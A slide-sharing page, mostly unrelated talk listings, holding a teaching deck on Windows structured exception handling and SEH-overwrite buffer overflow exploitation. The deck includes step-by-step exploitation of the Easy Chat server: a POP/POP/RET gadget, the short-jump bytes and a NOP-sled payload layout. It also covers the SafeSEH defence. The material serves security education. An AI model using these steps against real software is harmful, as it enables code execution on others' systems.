DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
Kari Kakkonen
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Tobias Schneck
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
Safe Software
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
Elena Simperl
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Product School
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
91mobiles
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
RTTS
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
KatiaHIMEUR1
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
Laura Byrne
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
Dorra BARTAGUIZ
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
Cheryl Hung
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
Product School
 

Recently uploaded (20)

From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
 

Seh based attack

  • 1. SEH BASED BUFFER OVERFLOW
  • 2.
  • 3.
  • 4. What is an Exception • An Exception is an event which occurs during execution, which requires execution of code outside normal flow of control.
  • 5. Exception Basics Operating System Process __try{ //exception may occur here ….. } _except(exception filter) { //This handles the exception …..printf(“exception”); } Exception Handler
  • 6. How dose the OS locate the Handlers Process Thread Information Block Exception Registration 8 bytes Pointer to Next Record Pointer to Handler Exception Registration Record FS:[0]
  • 7. Complicated Program with SEH Main() { functionA(); } fundtionA() { __try{ functionB(); }__except(…..) { ….. } functionB() { __try( functionC(); }__except(….) { ….. } { functionC() { __try{ print(“SHE Demo”) }__except(….) { ….. } }
  • 8. Exception Registration Linked List FS : [0] Record 1 8 bytes FFFFFF OS Handler Thread Information Block Exception Registration Process
  • 9. Complicated Program with SEH Main() { functionA(); } fundtionA() { __try{ ….previous line functionB(); }__except(…..) { ….. } } functionB() { __try( functionC(); }__except(….) { ….. } { functionC() { __try{ print(“SHE Demo”) }__except(….) { ….. } }
  • 10. Exception Registration Linked List Exception Registration Thread Information Block FFFFFFF OS Handler FS : [0] Record 2 Ptr to R2 Function A Handler Record 1
  • 11. Complicated Program with SEH Main() { functionA(); } fundtionA() { __try{ functionB(); }__except(…..) { ….. } } functionB() { __try( ….previous line functionC(); }__except(….) { ….. } { functionC() { __try{ print(“SHE Demo”) }__except(….) { ….. } }
  • 12. Exception Registration Linked List Exception Registration Thread Information Block FS : [0] Ptr to R2 FunctionB Handler Record 1 Record 2 Record 3 Ptr to R3 FunctionA Handler FFFFFFFF OS Handler
  • 13. Complicated Program with SEH Main() { functionA(); } fundtionA() { __try{ functionB(); B }__except(…..) { ….. } } functionB() { __try( functionC(); }__except(….) { ….. } { functionC() { __try{ print(“SEH Demo”) }__except(….) { ….. } }
  • 14. Exception Registration Linked List Exception Registration Thread Information Block FS : [0] Ptr to R2 FunctionC Handler Record 1 Record 2 Record 3 Ptr to R3 FunctionB Handler Ptr to R4 Record 4 FFFFFFFF OS Handler FunctionA Handler
  • 16. Program Stack without SEH fundC Local Variables funcB’s EBP Return Address in funcB funcC Argument 1 funcC Argument 2 fundB Local Variables funcA’s EBP Return Address in funcA funcB Argument 1 funcB Argument 2 fundA Local Variables Caller’s EBP Return Address in Caller funcAArgument 1 funcAA rgument 2 Bottom of Stack (High memory addresses) Unused Stack (Lower monory addresses) ESP EBP funcC’s Stack Frame funcB’s Stack Frame funcA’s Stake Frame
  • 18. Program Stack with SEH Bottom of Stack (High memory addresses) Unused Stack (Lower monory addresses) ESP EBP funcC’s Stack Frame funcB’s Stack Frame funcA’s Stake Frame funcC Local Variables Next Exception_Registration_Record funcC Exception Handler funcB’s EBP Return Address in funB funcC Argument 1 funcC Arfument 2 funcB Local Variables Next Exception_Registration_Record funcB Exception Handler funcA’s EBP Return Address in funcA funcB Argument 1 funcB Arfument 2 funcC Local Variables Next Exception_Registration_Record funcA Exception Handler Caller’s EBP Return Address in funB funcC Argument 1 funcC Arfument 2 funcC’s Exception Registration Record funcB’s Exception Registration Record funcA’s Exception Registration Record EBP
  • 19. Quick Recap of Concepts • SEH Consist of a chain Exception Registration Records • These Records are dynamically added and removed from a linked list based on where we are in code • FS : [0] points to the start of the SEH chain • When an Exception happens OS walks the SEH chain to check who can handle the exception • If a handler is found, it handles the exception; else default OS handler kicks in
  • 20. Who walks the SEH chain ? Exception Dispatcher KiUserExceptionDispatcher() RtlDispatchException() RtlExecuteHandlerForException() ExecuteHandler() _except_handler()
  • 21. _except_handler3() in turns calls our handler _except_handler3() { Scopetable filter-expression() _global_unwind2() RtlUnwind() RtlExcuteHandlerForUnwind() Scopetable_except block() } __try{ int*p = 0x000000 *p = 10; } _except(filter(…….)) { …..printf(“exception”); }
  • 22. Handler Prototype • Protptype for the exception handler is as follows ( excpt.h ) : EXCEPTION_DISPOSITION __cdecl_except_handler( struct_EXCEPTION_RECORD *ExceptionRecord, void * EstablisherFrame, struct_CONTEXT *ContexRecord, void * Dispatchercontext );
  • 23. Local Variable Next ERR ExceptionHandler() Func – B EBP RET of Func – B Func – C Arg 1 Func – C Arg 2 Program Stack FS[0] Low Memory Analyzing the 2 Stack Frames ExeceptionHandler() { …..EIP Exception Dispatcher Stack ….. ….. Establisher Frame ….. ….. ….. ….. ESP ESP+4 ESP+8
  • 24. Local Variable Next ERR ExceptionHandler() Func – B EBP RET of Func – B Func – C Arg 1 Func – C Arg 2 Program Stack FS[0] Low Memory What if? ExeceptionHandler() { EIP Exception Dispatcher Stack ….. ….. Establisher Frame ….. ….. ….. ….. ESP ESP+4 ESP+8 pop eax pop ebx retn
  • 25. Local Variable Next ERR ExceptionHandler() Func – B EBP RET of Func – B Func – C Arg 1 Func – C Arg 2 Program Stack Low Memory Pop EAX ExeceptionHandler() { EIP Exception Dispatcher Stack ESP ESP+4 ESP+8 pop eax pop ebx retn ….. Establisher Frame ….. ….. ….. …..
  • 26. Local Variable Next ERR ExceptionHandler() Func – B EBP RET of Func – B Func – C Arg 1 Func – C Arg 2 Program Stack Low Memory Pop EBX ExeceptionHandler() { EIP Exception Dispatcher Stack ESP ESP+4 ESP+8 pop eax pop ebx retn ….. Establisher Frame ….. ….. ….. …..
  • 27. Local Variable Next ERR ExceptionHandler() Func – B EBP RET of Func – B Func – C Arg 1 Func – C Arg 2 Program Stack Low Memory RETN ExeceptionHandler() { Exception Dispatcher Stack ESP ESP+4 ESP+8 pop eax pop ebx retn Establisher Frame ….. ….. ….. …..
  • 28. Local Variable Next ERR ExceptionHandler() Func – B EBP RET of Func – B Func – C Arg 1 Func – C Arg 2 Program Stack Low Memory RETN ExeceptionHandler() { Exception Dispatcher Stack ESP ESP+4 ESP+8 popup eax popup ebx retn Establisher Frame ….. ….. ….. ….. EIP
  • 29. Demo of overwrite with AAAAA…. • Verify the POP/POP/RET instruction sends control to the next ERR location • Cause a buffer overflow in the Easy Chat program by sending a large number of AAA
  • 30. Local Variable Next ERR ExceptionHandler() Func – B EBP RET of Func – B Func – C Arg 1 Func – C Arg 2 Program Stack FS[0] Low Memory How do we exploit this condition? AAAA Program Stack after overwrite FS[0] Low Memory
  • 31. Local Variable Next ERR ExceptionHandler() Func – B EBP RET of Func – B Func – C Arg 1 Func – C Arg 2 Program Stack FS[0] Low Memory How do we exploit this condition? AAAA Short JMP 6 Bytes ExceptionHandler() Program Stack after overwrite FS[0] Low Memory ExeceptionHandler() { pop eax pop ebx retn
  • 32. Local Variable Next ERR ExceptionHandler() Func – B EBP RET of Func – B Func – C Arg 1 Func – C Arg 2 Program Stack FS[0] Low Memory How do we exploit this condition? AAAA Short JMP 6 Bytes ExceptionHandler() NOP sled Payload Payload Payload Program Stack after overwrite FS[0] Low Memory ExeceptionHandler() { pop eax pop ebx retn Establisher Frame EIP Short JMP 6 Bytes 2 NOP Ptr to EH NOP Sled PayloadLow Memory 2 bytes 2 bytes 4 bytes Variable Length Variable Length
  • 33. Lets exploit Easy chat server • Steps : Find exact offset of next ERR and ExceptionHindler() on the stack Find a POP/POP/RET sequence in module without SAFESEH Overwrite ExceptionHindler() with address of POP/POP/RET Overwrite ERR with short JMP for 6 byes => “xEBx06x90x90” Add payload 6 bytes below after the ExceptionHandler()
  • 34. SEH Exploitation Protection • Modules linked with /SAFESEH cannot be used • Creates a list of “safe” exception handlers • OS will match the exception handler address with this list before executing it • If there is a match in this list, only then execution will happen • This was made by Microsoft to protect SEH from exploitation and applied Windows XP SP1 onwards
  • 35. ABUSING SEH Access violation / exception is triggered Pointer to Next SEH record Current SE Handler Pop,pop,ret Shellcode (1) Exception Handler kicks in (2) Current SE Handler was overwritten and points to pop,pop,ret (3) pop,pop,ret During prologue of exception handler, address of pointer to next SEH was put on stack of ESP+8 pop pop ret puts this address in EIP and allows execution of the code at the address of “pointer to next SEH” (4) Pointer to next SEH was overwritten with jmp to shellcode